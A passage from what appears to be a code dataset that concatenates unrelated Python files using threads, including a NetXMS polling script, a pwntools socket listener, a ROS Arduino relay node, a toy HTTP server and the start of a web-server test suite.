worker = Worker(name=i,
scenes=scenes,
targets=targets,
min_steps=min_steps,
starting_points=starting_points,
target_points=target_points,
tools=tools,
lowlevel_network=local_lowlevel_network,
global_episodes=global_episodes,
global_frames=global_frames)
workers.append(worker)
return graph, workers
def train():
graph, workers = set_up()
with tf.Session(graph=graph) as sess:
coord = tf.train.Coordinator()
all_threads = []
for worker in workers:
thread = threading.Thread(target=lambda: worker.work(sess))
thread.start()
sleep(0.1)
all_threads.append(thread)
coord.join(all_threads)
if __name__ == '__main__':
train()
|
poll_all_nodes.py | #!/usr/bin/env nxshell
import threading
import org.netxms.client.TextOutputListener
from Queue import Queue
from threading import Thread
class ProgressCallback(org.netxms.client.TextOutputListener):
def messageReceived(self, text):
print(self.tag + ": " + text.strip())
pass
def onError(self):
print(self.tag + ": onError")
pass
def setStreamId(self, streamId):
pass
def worker():
while True:
print("###: qsize %s ###" % q.qsize());
node = q.get()
cb = ProgressCallback()
cb.tag = node.objectName
s.pollNode(node.objectId, NodePollType.CONFIGURATION_NORMAL, cb)
#s.pollNode(node.objectId, NodePollType.CONFIGURATION_FULL, cb)
q.task_done()
q = Queue()
for i in range(25):
t = Thread(target=worker, name="Thread %d" % i)
t.daemon = True
t.start()
nodes = [o for o in s.allObjects if isinstance(o, objects.Node)]
for node in nodes:
q.put(node)
q.join()
print("######## ALL DONE")
|
utils.py | try:
if platform.system() == "Windows":
colorama.init()
except ImportError:
print("Could not init terminal features.")
sys.stdout.flush()
pass
if sys.version_info < (3, 3):
class TimeoutError(Exception):
pass
else:
TimeoutError = TimeoutError
def get_serial_number_str(device):
if hasattr(device, "serial_number"):
return format(device.serial_number, "x").upper()
else:
return "[unknown serial number]"
class Event:
"""
Alternative to threading.Event(), enhanced by the subscribe() function
that the original fails to provide.
@param Trigger: if supplied, the newly created event will be triggered
as soon as the trigger event becomes set
"""
def __init__(self, trigger=None):
self._evt = threading.Event()
self._subscribers = []
self._mutex = threading.Lock()
if not trigger is None:
trigger.subscribe(lambda: self.set())
def is_set(self):
return self._evt.is_set()
def set(self):
"""
Sets the event and invokes all subscribers if the event was
not already set
"""
self._mutex.acquire()
try:
if not self._evt.is_set():
self._evt.set()
for s in self._subscribers:
s()
finally:
self._mutex.release()
def subscribe(self, handler):
"""
Invokes the specified handler exactly once as soon as the
specified event is set. If the event is already set, the
handler is invoked immediately.
Returns a function that can be invoked to unsubscribe.
"""
if handler is None:
raise TypeError
self._mutex.acquire()
try:
self._subscribers.append(handler)
if self._evt.is_set():
handler()
finally:
self._mutex.release()
return handler
def unsubscribe(self, handler):
self._mutex.acquire()
try:
self._subscribers.pop(self._subscribers.index(handler))
finally:
self._mutex.release()
def wait(self, timeout=None):
if not self._evt.wait(timeout=timeout):
raise TimeoutError()
def trigger_after(self, timeout):
"""
Triggers the event after the specified timeout.
This function returns immediately.
"""
def delayed_trigger():
if not self.wait(timeout=timeout):
self.set()
threading.Thread(target=delayed_trigger)
t.daemon = True
t.start()
def wait_any(timeout=None, *events):
"""
Blocks until any of the specified events are triggered.
Returns the index of the event that was triggerd or raises
a TimeoutError
Param timeout: A timeout in seconds
"""
or_event = threading.Event()
subscriptions = []
for event in events:
subscriptions.append((event, event.subscribe(lambda: or_event.set())))
or_event.wait(timeout=timeout)
for event, sub in subscriptions:
event.unsubscribe(sub)
for i in range(len(events)):
if events[i].is_set():
return i
raise TimeoutError()
class Logger:
"""
Logs messages to stdout
"""
COLOR_DEFAULT = 0
COLOR_GREEN = 1
COLOR_CYAN = 2
COLOR_YELLOW = 3
COLOR_RED = 4
_VT100Colors = {COLOR_GREEN: "\x1b[92;1m", COLOR_CYAN: "\x1b[96;1m", COLOR_YELLOW: "\x1b[93;1m", COLOR_RED: "\x1b[91;1m", COLOR_DEFAULT: "\x1b[0m"}
_Win32Colors = {COLOR_GREEN: 0x0A, COLOR_CYAN: 0x0B, COLOR_YELLOW: 0x0E, COLOR_RED: 0x0C, COLOR_DEFAULT: 0x07}
def __init__(self, verbose=True):
self._prefix = ""
self._skip_bottom_line = False
self._verbose = verbose
self._print_lock = threading.Lock()
if platform.system() == "Windows":
self._stdout_buf = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE)
def indent(self, prefix=" "):
indented_logger = Logger()
indented_logger._prefix = self._prefix + prefix
return indented_logger
def print_on_second_last_line(self, text, color):
"""
Prints a text on the second last line.
This can be used to print a message above the command
prompt. If the command prompt spans multiple lines
there will be glitches.
If the printed text spans multiple lines there will also
be glitches (though this could be fixed).
"""
if platform.system() == "Windows":
info = self._stdout_buf.GetConsoleScreenBufferInfo()
cursor_pos = info["CursorPosition"]
scroll_rect = win32console.PySMALL_RECTType(Left=0, Top=1, Right=info["Window"].Right, Bottom=cursor_pos.Y - 1)
scroll_dest = win32console.PyCOORDType(scroll_rect.Left, scroll_rect.Top - 1)
self._stdout_buf.ScrollConsoleScreenBuffer(scroll_rect, scroll_rect, scroll_dest, u" ", Logger._Win32Colors[color])
line_start = win32console.PyCOORDType(0, cursor_pos.Y - 1)
self._stdout_buf.WriteConsoleOutputCharacter(text, line_start)
else:
self._print_lock.acquire()
sys.stdout.write("\x1b7\x1b[1A\x1b[1S\x1b[1L")
sys.stdout.write(Logger._VT100Colors[color] + text + Logger._VT100Colors[Logger.COLOR_DEFAULT])
sys.stdout.write("\x1b8")
sys.stdout.flush()
self._print_lock.release()
def print_colored(self, text, color):
if self._skip_bottom_line:
self.print_on_second_last_line(text, color)
else:
self._print_lock.acquire()
sys.stdout.write(Logger._VT100Colors[color] + text + Logger._VT100Colors[Logger.COLOR_DEFAULT] + "\n")
sys.stdout.flush()
self._print_lock.release()
def debug(self, text):
if self._verbose:
self.print_colored(self._prefix + text, Logger.COLOR_DEFAULT)
def success(self, text):
self.print_colored(self._prefix + text, Logger.COLOR_GREEN)
def info(self, text):
self.print_colored(self._prefix + text, Logger.COLOR_DEFAULT)
def notify(self, text):
self.print_colored(self._prefix + text, Logger.COLOR_CYAN)
def warn(self, text):
self.print_colored(self._prefix + text, Logger.COLOR_YELLOW)
def error(self, text):
self.print_colored(self._prefix + text, Logger.COLOR_RED) |
listen.py | import errno
import socket
from ..context import context
from ..log import getLogger
from ..timeout import Timeout
from .sock import sock
log = getLogger(__name__)
class listen(sock):
"""Creates an TCP or UDP-socket to receive data on. It supports
both IPv4 and IPv6.
The returned object supports all the methods from
:class:`pwnlib.tubes.sock` and :class:`pwnlib.tubes.tube`.
Arguments:
port(int): The port to connect to.
bindaddr(str): The address to bind to.
fam: The string "any", "ipv4" or "ipv6" or an integer to pass to :func:`socket.getaddrinfo`.
typ: The string "tcp" or "udp" or an integer to pass to :func:`socket.getaddrinfo`.
timeout: A positive number, None
"""
def __init__(self, port=0, bindaddr = "0.0.0.0",
fam = "any", typ = "tcp",
timeout = Timeout.default, level = None):
super(listen, self).__init__(timeout, level = level)
port = int(port)
if fam == 'any':
fam = socket.AF_UNSPEC
elif fam == 4 or fam.lower() in ['ipv4', 'ip4', 'v4', '4']:
fam = socket.AF_INET
elif fam == 6 or fam.lower() in ['ipv6', 'ip6', 'v6', '6']:
fam = socket.AF_INET6
elif isinstance(fam, (int, long)):
pass
else:
self.error("remote(): family %r is not supported" % fam)
if typ == "tcp":
typ = socket.SOCK_STREAM
elif typ == "udp":
typ = socket.SOCK_DGRAM
elif isinstance(typ, (int, long)):
pass
else:
self.error("remote(): type %r is not supported" % typ)
h = self.waitfor('Trying to bind to %s on port %d' % (bindaddr, port))
for res in socket.getaddrinfo(bindaddr, port, fam, typ, 0, socket.AI_PASSIVE):
self.family, self.type, self.proto, self.canonname, self.sockaddr = res
if self.type not in [socket.SOCK_STREAM, socket.SOCK_DGRAM]:
continue
h.status("Trying %s" % self.sockaddr[0])
listen_sock = socket.socket(self.family, self.type, self.proto)
listen_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_sock.bind(self.sockaddr)
self.lhost, self.lport = listen_sock.getsockname()[:2]
if self.type == socket.SOCK_STREAM:
listen_sock.listen(1)
break
else:
h.failure()
self.error("Could not bind to %s on port %d" % (bindaddr, port))
h.success()
h = self.waitfor('Waiting for connections on %s:%s' % (self.lhost, self.lport))
def accepter():
while True:
try:
if self.type == socket.SOCK_STREAM:
self.sock, rhost = listen_sock.accept()
listen_sock.close()
else:
self.buffer, rhost = listen_sock.recvfrom(4096)
listen_sock.connect(rhost)
self.sock = listen_sock
self.settimeout(self.timeout)
break
except socket.error as e:
if e.errno == errno.EINTR:
continue
h.failure()
self.exception("Socket failure while waiting for connection")
self.sock = None
return
self.rhost, self.rport = rhost[:2]
h.success('Got connection from %s on port %d' % (self.rhost, self.rport))
self._accepter = context.Thread(target = accepter)
self._accepter.daemon = True
self._accepter.start()
def spawn_process(self, *args, **kwargs):
def accepter():
self.wait_for_connection()
p = super(listen, self).spawn_process(*args, **kwargs)
p.wait()
self.close()
t = context.Thread(target = accepter)
t.daemon = True
t.start()
def wait_for_connection(self):
"""Blocks until a connection has been established."""
self.sock
return self
def __getattr__(self, key):
if key == 'sock':
while self._accepter.is_alive():
self._accepter.join(timeout = 0.1)
if 'sock' in self.__dict__:
return self.sock
else:
return None
else:
return getattr(super(listen, self), key)
def close(self):
# since `close` is scheduled to run on exit we must check that we got
# a connection or the program will hang in the `join` call above
if self._accepter.is_alive():
return
super(listen, self).close()
|
arduino_relay.py | #!/usr/bin/env python
from __future__ import print_function
#import time
from math import pi
# import traceback
import os
import sys
import time
import threading
# import cPickle as pickle
from functools import partial
#from math import pi, sin, cos
#import numpy as np
import rospy
import tf
#import tf2_ros
#http://docs.ros.org/api/sensor_msgs/html/msg/Imu.html
from sensor_msgs.msg import Imu
#http://wiki.ros.org/std_msgs
from sensor_msgs.msg import JointState
from std_msgs.msg import Header, String, UInt16MultiArray, Bool, Int16
#from std_srvs.srv import Empty, EmptyResponse
from nav_msgs.msg import Odometry
from geometry_msgs.msg import Quaternion, Point
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus#, KeyValue
from ros_homebot_python.node import say
from ros_homebot_python import constants as c
#from ros_homebot_python.node import BaseArduinoNode
OK = DiagnosticStatus.OK # 0
WARN = DiagnosticStatus.WARN # 1
ERROR = DiagnosticStatus.ERROR # 2
STALE = DiagnosticStatus.STALE # 3
IMU_CALIBRATION_FN = 'imu_calibration.pickle'
V0 = 'v0'
V1 = 'v1'
status_id_to_name = {
OK: 'OK',
WARN: 'WARN',
ERROR: 'ERROR',
STALE: 'STALE',
}
def ltof(values):
"""
Converts the special integer-encoded doubles back into Python floats.
See the Arduino's equivalent ftol().
"""
assert isinstance(values, (tuple, list))
return [int(_)/1000. for _ in values]
# Based on https://goo.gl/mY0th1
# http://wiki.ros.org/tf2/Tutorials/Writing%20a%20tf2%20broadcaster%20%28Python%29
# http://wiki.ros.org/navigation/Tutorials/RobotSetup/Odom
# http://answers.ros.org/question/79851/python-odometry/
class ArduinoRelay:
cache_dir = '~/.homebot_cache/torso_relay'
# Covariance
#P = np.mat(np.diag([0.0]*3))
def __init__(self):
rospy.init_node('arduino_relay')
self._imu_data = {}
self._lock = threading.RLock()
# self.imu_calibration_loaded = False
# self.imu_calibration_loaded_time = rospy.Time(0)
self.diagnostics_msg_count = 0
self.diagnostics_buffer = []
# http://wiki.ros.org/tf/Tutorials/Writing%20a%20tf%20broadcaster%20%28Python%29
self.tf_br = tf.TransformBroadcaster()
#self.tf2_br = tf2_ros.TransformBroadcaster()
#rospy.Service('~reset_odometry', Empty, self.reset_odometry)
## Publishers.
self.diagnostics_pub = rospy.Publisher('/diagnostics', DiagnosticArray, queue_size=10)
self.odometry_pub = rospy.Publisher('/odom', Odometry, queue_size=10)
self.imu_calibration_load_pub = rospy.Publisher('/torso_arduino/imu_calibration_load', UInt16MultiArray, queue_size=1)
self.imu_pub = rospy.Publisher('/imu_data', Imu, queue_size=10)
self.joint_pub = rospy.Publisher('joint_states', JointState, queue_size=10)
self._joint_pub_lock = threading.RLock()
self.last_pan_angle = None
self.last_tilt_angle = None
self.received_angles = False
self._joint_pub_thread = threading.Thread(target=self.publish_joints_thread)
self._joint_pub_thread.daemon = True
self._joint_pub_thread.start()
## Head Subscribers.
rospy.Subscriber('/head_arduino/diagnostics_relay', String, partial(self.on_diagnostics_relay, prefix='head'))
rospy.Subscriber('/head_arduino/pan_degrees', Int16, self.on_head_pan_degrees)
rospy.Subscriber('/head_arduino/tilt_degrees', Int16, self.on_head_tilt_degrees)
## Torso Subscribers.
rospy.Subscriber('/torso_arduino/diagnostics_relay', String, partial(self.on_diagnostics_relay, prefix='torso'))
# rospy.Subscriber('/torso_arduino/imu_calibration_save', UInt16MultiArray, self.on_imu_calibration_save)
rospy.Subscriber('/torso_arduino/imu_relay', String, self.on_imu_relay)
rospy.Subscriber('/torso_arduino/odometry_relay', String, self.on_odometry_relay)
rospy.Subscriber('/torso_arduino/power_shutdown', Bool, self.on_power_shutdown)
self._odom_lock = threading.RLock()
self.pos = None
self.ori = None
# self._motor_target_left = None
# self._motor_target_right = None
# rospy.Subscriber('/torso_arduino/motor_target_a', Int16, partial(self.on_motor_target, side='left'))
# rospy.Subscriber('/torso_arduino/motor_target_b', Int16, partial(self.on_motor_target, side='right'))
# self._motor_encoder_left = None
# self._motor_encoder_right = None
# rospy.Subscriber('/torso_arduino/motor_encoder_a', Int16, partial(self.on_motor_encoder, side='left'))
# rospy.Subscriber('/torso_arduino/motor_encoder_b', Int16, partial(self.on_motor_encoder, side='right'))
## Begin IO.
rospy.spin()
@property
def imu_calibration_filename(self):
cache_dir = os.path.expanduser(self.cache_dir)
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
fn = os.path.join(cache_dir, IMU_CALIBRATION_FN)
return fn
# def load_imu_calibration(self):
# """
# Automatically called once after the first diagnostic message is received.
# Per Adafruit's documentation:
# "One thing to keep in mind though is that the sensor isn't necessarily 'plug and play' with
# loading the calibration data, in particular the magnetometer needs to be recalibrated even if
# the offsets are loaded. The magnetometer calibration is very dynamic so saving the values
# once might"
# """
# try:
# fn = self.imu_calibration_filename
# if os.path.isfile(fn):
# rospy.loginfo('Loading imu calibration %s...' % fn)
# with open(fn, 'r') as fin:
# msg = pickle.load(fin)
# rospy.loginfo('Sending calibration:')
# rospy.loginfo(msg)
# self.imu_calibration_load_pub.publish(msg)
# self.imu_calibration_loaded = True
# self.imu_calibration_loaded_time = rospy.Time.now()
# rospy.loginfo('Sent.')
# else:
# rospy.loginfo('No saved imu calibration.')
# except Exception as exc:
# traceback.print_exc()
# finally:
# self.imu_calibration_loaded = True
def on_head_pan_degrees(self, msg):
"""
Re-publishes the pan angle as a standard JointState message.
"""
# rospy.loginfo('pan: %s' % msg.data)
with self._joint_pub_lock:
self.last_pan_angle = msg.data*pi/180.
self.received_angles = True
self.publish_joints()
def on_head_tilt_degrees(self, msg):
"""
Re-publishes the tilt angle as a standard JointState message.
"""
# rospy.loginfo('tilt: %s' % msg.data)
with self._joint_pub_lock:
self.last_tilt_angle = msg.data*pi/180.
self.received_angles = True
self.publish_joints()
def publish_joints_thread(self):
time.sleep(3)
while 1:
if self.received_angles:
self.publish_joints()
time.sleep(1)
def publish_joints(self):
if self.last_tilt_angle is None:
rospy.logwarn('No tilt angle, aborting joint publish.')
return
if self.last_pan_angle is None:
rospy.logwarn('No pan angle, aborting joint publish.')
return
with self._joint_pub_lock:
joint_state = JointState()
joint_state.header = Header()
joint_state.header.stamp = rospy.Time.now()
joint_state.name = [
c.FOOTPRINT_TO_TORSO_JOINT,
c.TORSO_TO_NECK_JOINT,
c.NECK_TO_HEAD_JOINT,
c.HEAD_TO_CAMERA_JOINT,
]
joint_state.position = [
0,
self.last_pan_angle,
self.last_tilt_angle,
0,
]
joint_state.velocity = []
joint_state.effort = []
self.joint_pub.publish(joint_state)
def on_power_shutdown(self, msg):
rospy.loginfo('Received shutdown signal. Issuing halt command in 3 seconds...')
try:
say(c.SYSTEM_SHUTDOWN_SPEECH)
except Exception as exc: # pylint: disable=broad-except
rospy.logerr('Unable to speak about shutdown: %s', exc)
time.sleep(3)
os.system('sudo halt')
# After halt is performed, all ROS nodes will be killed.
# The torso Arduino will then wait a few seconds to allow Linux to clean up all processes, and then it will kill all system power.
# See the deadman flag that triggers the call to power_controller.shutdown().
# def on_imu_calibration_save(self, msg):
# #print('Received imu calibration:', msg)
# if sum(msg.data) == 0:
# rospy.logwarn('Ignoring blank calibration.')
# self.load_imu_calibration()
# return
# fn = self.imu_calibration_filename
# with open(fn, 'w') as fout:
# pickle.dump(msg, fout)
def on_imu_relay(self, msg):
parts = msg.data.split(':')
# Validate type.
typ = parts[0]
assert typ in 'aeg', 'Invalid typ: %s' % typ
# Convert the integers to the original floats.
nums = ltof(parts[1:])
for num, axis in zip(nums, 'xyz'):
self._imu_data['%s%s' % (typ, axis)] = num
# If we've received the final segment, re-publish the complete IMU message.
if typ == 'a':
# https://docs.ros.org/api/sensor_msgs/html/msg/Imu.html
imu_msg = Imu()
imu_msg.header = Header()
imu_msg.header.stamp = rospy.Time.now()
imu_msg.header.frame_id = c.BASE_LINK #TODO
# Our sensor returns Euler angles in degrees, but ROS requires radians.
# http://answers.ros.org/question/69754/quaternion-transformations-in-python/
roll = self._imu_data['ex']
pitch = self._imu_data['ey']
yaw = self._imu_data['ez']
quaternion = tf.transformations.quaternion_from_euler(roll, pitch, yaw)
imu_msg.orientation.x = quaternion[0]
imu_msg.orientation.y = quaternion[1]
imu_msg.orientation.z = quaternion[2]
imu_msg.orientation.w = quaternion[3]
imu_msg.orientation_covariance = [1, 0.001, 0.001, 0.001, 1, 0.001, 0.001, 0.001, 1]
imu_msg.angular_velocity.x = self._imu_data['gx']
imu_msg.angular_velocity.y = self._imu_data['gy']
imu_msg.angular_velocity.z = self._imu_data['gz']
imu_msg.angular_velocity_covariance = [1, 0.001, 0.001, 0.001, 1, 0.001, 0.001, 0.001, 1]
imu_msg.linear_acceleration.x = self._imu_data['ax']
imu_msg.linear_acceleration.y = self._imu_data['ay']
imu_msg.linear_acceleration.z = self._imu_data['az']
imu_msg.linear_acceleration_covariance = [1, 0.001, 0.001, 0.001, 1, 0.001, 0.001, 0.001, 1]
self.imu_pub.publish(imu_msg)
def on_diagnostics_relay(self, msg, prefix):
"""
The Arduino has limited RAM and an even more limited serial buffer, so it can't send complex ROS structures like DiagnosticArrays.
So instead, it publishes diagnostic data via a key/value pair formatted in a simple string,
which we convert to a proper diagnostic message.
"""
#print('diagnostics.msg:', msg)
self.diagnostics_msg_count += 1
# if (rospy.Time.now() - self.imu_calibration_loaded_time).secs >= 300:
# self.load_imu_calibration()
# Aggregate single-character messages into a complete message.
# if not msg.data:
# #print('Received empty message.')
# return
# elif msg.data[0] == '^':
# #print('Received message start.')
# self.diagnostics_buffer = []
# return
# elif msg.data[0] == '$':
# #print('Received message end.')
# msg.data = ''.join(self.diagnostics_buffer)
# else:
# #print('Recieved %i chars.' % len(msg.data))
# self.diagnostics_buffer.append(msg.data)
# return
# Extract parts.
# print('Message length:', len(msg.data))
# print('Message data:', msg.data)
parts = msg.data.split(':')
if len(parts) < 2:
rospy.logerr('Malformed diagnostics message.', file=sys.stderr)
return
# Complete name part.
name = '%s: %s' % (prefix, parts[0].strip())
# Complete level part.
try:
level = int(parts[1]) # OK|WARN|ERROR|STALE
assert level in range(4)
except (TypeError, ValueError, AssertionError) as exc:
rospy.logerr('Malformed level: "%s"', parts[1])
return
# Complete message part.
message = ''
if len(parts) >= 3:
message = parts[2].strip()
if message == '?':
message = ''
if not message:
# If not given, default the message to the name equivalent of the level.
message = status_id_to_name.get(level, '')
# Construct and send diagnostics array.
# http://docs.ros.org/api/diagnostic_msgs/html/msg/DiagnosticStatus.html
array = DiagnosticArray()
array.status = [
DiagnosticStatus(name=name, level=level, message=message)
]
with self._lock:
self.diagnostics_pub.publish(array)
def on_odometry_relay(self, msg):
parts = msg.data.split(':')
if len(parts) < 5:
rospy.logerr('Malformed odometry message.', file=sys.stderr)
return
# Validate type.
typ = parts[0]
assert typ in (V0, V1), 'Invalid type: %s' % typ
# Validate numbers.
nums = ltof(parts[1:])
# Save type parts.
if typ == V0:
# Position.
# x,y,z,th
self._odometry_v0 = nums
else:
# Velocity.
# vx,vy,vz,vth
self._odometry_v1 = nums
# Combine and publish a complete odometry message on the receipt of the last part.
if typ == V1:
current_time = rospy.Time.now()
# print('position:', self._odometry_v0)
x, y, z, th = self._odometry_v0
# print('velocity:', self._odometry_v1)
vx, vy, vz, vth = self._odometry_v1
# since all odometry is 6DOF we'll need a quaternion created from yaw
#geometry_msgs::Quaternion odom_quat = tf::createQuaternionMsgFromYaw(th);
odom_quat = Quaternion(*tf.transformations.quaternion_from_euler(0, 0, th))
# https://docs.ros.org/kinetic/api/nav_msgs/html/msg/Odometry.html
msg = Odometry()
msg.header.stamp = current_time
msg.header.frame_id = c.ODOM
msg.child_frame_id = c.BASE_LINK
msg.pose.pose.position = Point(x, y, z)
msg.pose.pose.orientation = odom_quat
msg.pose.covariance = [
1, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 1, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 1, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 1, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 1, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 1,
]
msg.twist.twist.linear.x = vx
msg.twist.twist.linear.y = vy
msg.twist.twist.angular.z = vth
msg.twist.covariance = [
1, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 1, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 1, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 1, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 1, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 1,
]
# publish the odometry message
self.odometry_pub.publish(msg)
with self._odom_lock:
self.pos = (
msg.pose.pose.position.x,
msg.pose.pose.position.y,
msg.pose.pose.position.z,
)
self.ori = (
msg.pose.pose.orientation.x,
msg.pose.pose.orientation.y,
msg.pose.pose.orientation.z,
msg.pose.pose.orientation.w,
)
# first, we'll publish the transform over tf
#geometry_msgs::TransformStamped odom_trans;
# odom_trans = TransformStamped()
# odom_trans.header.stamp = self.current_time
# odom_trans.header.frame_id = self.frame_id
# odom_trans.child_frame_id = self.child_frame_id
# odom_trans.transform.translation.x = self.x
# odom_trans.transform.translation.y = self.y
# odom_trans.transform.translation.z = self.z
# odom_trans.transform.rotation = odom_quat
# send the transform
self.tf_br.sendTransform(self.pos, self.ori, msg.header.stamp, msg.child_frame_id, msg.header.frame_id)
#self.tf2_br.sendTransform(odom_trans)
if __name__ == '__main__':
ArduinoRelay()
|
server.py | import os, sys
sys.path.append("/Users/Pichau/Documents/projects/Http-Server/src/server/http")
import socket
import logging
import threading
import conf
from random import randint
from request import RequestParser, Path
from errors import HttpBaseError
from datetime import datetime
class SocketServer(object):
@staticmethod
def http(port, host='0.0.0.0'):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((host, port))
server_socket.listen(1)
return server_socket
class HttpBaseServer:
def __init__(self, port, paths):
self.socket = SocketServer.http(port=port)
self.path = Path(local=paths)
print(f"[{datetime.now()}] STARTED SERVER")
def serve_forever(self) -> None:
while True:
try:
client_connection, client_address = self.socket.accept()
print(f"[{datetime.now()}] CONNECTION RECEIVED FROM {client_address[0]}")
request = client_connection.recv(1024).decode()
response = self.route(request=request)
client_connection.sendall(response.encode())
threading.Thread(target=client_connection.close, args=()).start()
except KeyboardInterrupt:
self.socket.close()
break
print(f"[{datetime.now()}] CLOSED SERVER")
def route(self, request) -> None:
parser = RequestParser(request=request)
request_path = parser.path()
try:
return self.path.route(request_path)
except HttpBaseError as e:
return str(e)
if __name__=='__main__':
route = {
'/teste': str(Html(html_path='../../test/index.html', status='200 OK'))
}
HttpBaseServer(port=8000, paths=route).serve_forever()
# server = HttpServer(8000).serve_forever()
# html_server = HtmlServe(8000).html('../../test/index.html').serve_forever() |
meanfield_montecarlo_multi.py | #!/usr/bin/env python3
import multiprocessing
import numpy
import sys
sys.path.append("..")
from meanfield_share import calc_meanfield_montecarlo
def calc_meanfield_multi(q,P,R,c,p,init,b,rand_seed):
numpy.random.seed(rand_seed)
overlap,cor=calc_meanfield_montecarlo(P,R,c,p,init,b)
q.put((c,overlap,cor))
if __name__=="__main__":
#parameters
P=71
R=10**6
Nrepeat=5
p=float(sys.argv[1])
maxparam=3
param_mesh=0.05
tmp=int(numpy.round(maxparam/param_mesh))
param_arr=list(map(lambda x:x*param_mesh, range(-tmp,tmp+1)))
param_arr=numpy.around(param_arr, decimals=2)
Nparam=len(param_arr)
Nprocess=40
Phalf=int((P+1)//2)
init=numpy.zeros(P)
init[Phalf-1]=1.0
ext_input=numpy.zeros(P)
#start parallel calculation -> get results
que=multiprocessing.Queue()
process_arr=[]
results_overlap=[]
results_cor=[]
process_num=0
rand_seed=0
for param_count in range(Nparam):
for ite in range(Nrepeat):
param=param_arr[param_count]
print(param,ite)
process_arr.append(multiprocessing.Process(target=calc_meanfield_multi, args=(que,P,R,param,p,init,ext_input,rand_seed)))
rand_seed+=1
process_arr[-1].start()
process_num+=1
if process_num>=Nprocess or (param_count+1==Nparam and ite+1==Nrepeat):
for i in range(process_num):
process_arr[i].join()
if que.empty():
print("Nothing was returned from child processes.")
exit()
while not que.empty():
tmp=que.get()
results_overlap.append(numpy.concatenate([tmp[0:1],tmp[1]], axis=0))
results_cor.append(numpy.concatenate([tmp[0:1],tmp[2]], axis=0))
process_arr.clear()
process_num=0
#save to file
numpy.savetxt("param_val.csv", param_arr, delimiter=",")
numpy.savetxt("overlap.csv", results_overlap, delimiter=",")
numpy.savetxt("cor.csv", results_cor, delimiter=",")
|
server_test.py | import json
import os
import threading
import traceback
from asyncio import set_event_loop_policy
from unittest import TestCase
from unittest.mock import patch, MagicMock
import requests
from parameterized import parameterized
from tornado.ioloop import IOLoop
from tornado.web import create_signed_value
from auth.authorization import Authorizer, ANY_USER, EmptyGroupProvider
from config.config_service import ConfigService
from features.file_download_feature import FileDownloadFeature
from features.file_upload_feature import FileUploadFeature
from files.user_file_storage import UserFileStorage
from model.server_conf import ServerConfig, XSRF_PROTECTION_TOKEN, XSRF_PROTECTION_HEADER
from tests import test_utils
from tests.test_utils import MockAuthenticator
from utils import os_utils, env_utils, file_utils
from web import server
def is_unsupported_ioloop_exception(e):
stacktrace = traceback.extract_tb(e.__traceback__)
failed_method = stacktrace[-1].name
return failed_method == 'add_reader'
class ServerTest(TestCase):
def test_init_when_linux(self):
test_utils.set_linux()
try:
self.start_server(12345, '127.0.0.1')
if self.requires_explicit_ioloop_factory:
self.fail('Server should NOT be startable on current environment')
else:
self.check_server_running()
except NotImplementedError as e:
if self.requires_explicit_ioloop_factory and is_unsupported_ioloop_exception(e):
return
raise
@patch('utils.env_utils.sys.version_info', (3, 8, 0))
def test_init_when_windows_and_python_3_8(self):
test_utils.set_win()
try:
self.start_server(12345, '127.0.0.1')
self.check_server_running()
except AttributeError:
# Linux/Mac doesn't support windows specific classes
if not self.windows:
return
raise
@patch('utils.env_utils.sys.version_info', (3, 7, 0))
def test_init_when_windows_and_python_3_7(self):
test_utils.set_win()
try:
self.start_server(12345, '127.0.0.1')
if self.requires_explicit_ioloop_factory:
self.fail('Server should NOT be startable on current environment')
else:
self.check_server_running()
except NotImplementedError as e:
if self.requires_explicit_ioloop_factory and is_unsupported_ioloop_exception(e):
return
raise
def test_get_scripts(self):
self.start_server(12345, '127.0.0.1')
test_utils.write_script_config({'name': 's1'}, 's1', self.runners_folder)
test_utils.write_script_config({'name': 's2', 'group': 'Xyz'}, 's2', self.runners_folder)
test_utils.write_script_config({'name': 's3'}, 's3', self.runners_folder)
response = self.request('GET', 'http://127.0.0.1:12345/scripts')
self.assertCountEqual([
{'name': 's1', 'group': None},
{'name': 's2', 'group': 'Xyz'},
{'name': 's3', 'group': None}],
response['scripts'])
@parameterized.expand([
('X-Forwarded-Proto',),
('X-Scheme',)])
def test_redirect_honors_protocol_header(self, header):
self.start_server(12345, '127.0.0.1')
response = self._user_session.get('http://127.0.0.1:12345/',
allow_redirects=False,
headers={header: 'https'})
self.assertRegex(response.headers['Location'], '^https')
def test_xsrf_protection_when_token(self):
self.start_server(12345, '127.0.0.1')
test_utils.write_script_config({'name': 's1', 'script_path': 'ls'}, 's1', self.runners_folder)
response = self._user_session.get('http://127.0.0.1:12345/scripts')
xsrf_token = response.cookies.get('_xsrf')
start_response = self._user_session.post(
'http://127.0.0.1:12345/executions/start',
data={'__script_name': 's1'},
files=[('notafile', None)],
headers={'X-XSRFToken': xsrf_token},
cookies=response.cookies
)
self.assertEqual(start_response.status_code, 200)
self.assertEqual(start_response.content, b'3')
def test_xsrf_protection_when_token_failed(self):
self.start_server(12345, '127.0.0.1')
test_utils.write_script_config({'name': 's1', 'script_path': 'ls'}, 's1', self.runners_folder)
response = self._user_session.get('http://127.0.0.1:12345/scripts')
start_response = self._user_session.post(
'http://127.0.0.1:12345/executions/start',
data={'__script_name': 's1'},
files=[('notafile', None)],
headers={'X-Requested-With': 'XMLHttpRequest'},
cookies=response.cookies
)
self.assertEqual(start_response.status_code, 403)
def test_xsrf_protection_when_header(self):
self.start_server(12345, '127.0.0.1', xsrf_protection=XSRF_PROTECTION_HEADER)
test_utils.write_script_config({'name': 's1', 'script_path': 'ls'}, 's1', self.runners_folder)
self._user_session.get('http://127.0.0.1:12345/scripts')
start_response = self._user_session.post(
'http://127.0.0.1:12345/executions/start',
data={'__script_name': 's1'},
files=[('notafile', None)],
